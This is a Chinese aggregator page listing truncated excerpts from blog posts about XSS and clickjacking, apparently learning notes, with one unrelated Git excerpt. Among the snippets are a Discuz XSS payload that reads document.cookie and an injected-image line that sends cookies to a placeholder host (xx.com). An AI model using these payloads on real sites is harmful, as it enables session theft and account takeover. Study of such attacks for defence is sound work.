XSS学习笔记(一个)-点击劫持】的更多相关文章

前言: 放假了,上个星期刚刚学习完点击劫持漏洞.没来的及写笔记,今天放学总结了一下 并写了一个检测点击劫持的脚本.点击劫持脚本说一下哈.= =原本是打算把网站源码 中的js也爬出来将一些防御的代码匹配一下.可惜,爬出来的js链接乱的一匹.弄了很久 也很乱.所以就没有匹配js文件了. 漏洞介绍: 漏洞名称:点击劫持漏洞(Clicking hijacking) 级别:中级 漏洞用于场景:钓鱼,欺骗. <黑客攻防之浏览器篇>里有详细的利用教程. 里面所介绍的工具做出来的payload能以假乱真 攻击…
所谓XSS这个场景被触发XSS地方,在大多数情况下,攻击者被嵌入在网页中(问题)该恶意脚本(Cross site Scripting),这里的攻击始终触发浏览器端,攻击的者的目的.一般都是获取用户的Cookie(能够还原账户登录状态),导航到恶意网址,携带木马,作为肉鸡发起CC攻击.传播XSS蠕虫等. 整体分为三类: Dom-Based(Dom式) Stroed-Based(存储式) Reflex-Based(反射式) 简单举一个场景: 在一个页面有一个textbox 代码就是<input ty…
那个fanh前面学习的都是基础,现在开始正式学习下安全的知识,这一章主要讲解客户端常见的安全漏洞. 看到这个不错,给大家记一下: 1.常见的安全事件: 2.XSS(跨站脚本),英文全称:Cross Site Script 危害:盗取用户信息.钓鱼.制造蠕虫等. XSS攻击的特点就是:尽一切办法在目标网站上执行非目标网站上原有的脚本. 3.XSS分类: (1)存储型(黑客将XSS脚本存入数据库,用户访问时再返回给用户): (2)反射型(黑客发生一个包含xss的url,用户点击后触发): 这两种对比…
<script type="text/javascript" reload="1">setTimeout("window.location.href ='http://www.discuz.net/./a'; alert(document.cookie);a='';", 3000);</script> 1.在这个样例(如今早已补)中希望大家也要体会到:XSS的上下文比較重要,怎样依据上下文,利用未过滤的字符,合理的构造,才…
上次学习的是页面加载完成后弹出一个警告框,这里我们改为当用户点击后弹出一个警告框. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=…
这里我看了下http://qings.blog.51cto.com/4857138/998878/ 的文章,感谢他的分享. 首先我们有一个a标签和一个div,div默认是不显示的,当用户点击时改为显示. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <h…
本片文章是读<<XSS跨站脚本gj剖析与防御>>一书的总结 常见的XSS攻击主要用于1.网络钓鱼,盗用用户账号2.窃取cookies 非httponly情况下,读取document.cookie通过xss注入读取document.cookie并将cookie信息记录到远程服务器,然后使用桂林老兵cookie欺骗工具与服务器建立绘画document.write(<img src=http://xx.com/cookie.aspx?cookie='+document.cookie…
如果只生产XSS的地方都与输入或输出相关联的.所以错过了主要矛盾.而且,我们将有一个解决问题的办法:您可以输入端砚格过滤,是可能的过滤输出时间,输出到用户的GET或POST中是否有敏感字符: 输入过滤: 过滤 ' " , <  > \   <!-- client: 开启 XSS filter  输出过滤(转义): 转义: ' "  \ <  <!-- (转义为 等HTML硬编码) 过滤: <script> href </script>…
1. 命令: git init           创建新仓库 (在一个空文件下然后执行命令) git clone  + 路径      检出仓库,从本地或从服务器上 git status     查看工作区(working dir)的状态. 2. git工作流: 三棵树: working dir ——>index(缓存区)——>head     (本地仓库的组成) add                                 commit a:git add  将计划改动添加到缓存…
XSS的分类 非持久型 非持久型XSS也称反射型XSS.具体原理就是当用户提交一段代码的时候,服务端会马上返回页面的执行结果.那么当攻击者让被攻击者提交一个伪装好的带有恶意代码的链接时,服务端也会立刻处理这段恶意代码,并返回执行结果.如果服务端对这段恶意代码不加过滤的话,恶意代码就会在页面上被执行,攻击就成功了.举个例子,一般的网页是有搜索框的对吧,如果攻击者搜索一段带有html标签的字符串,搜索的结果就会以该形式显现在页面上,或者至少页面上会包含用户搜索的字符串,而如果我们提交一段精心构造的字…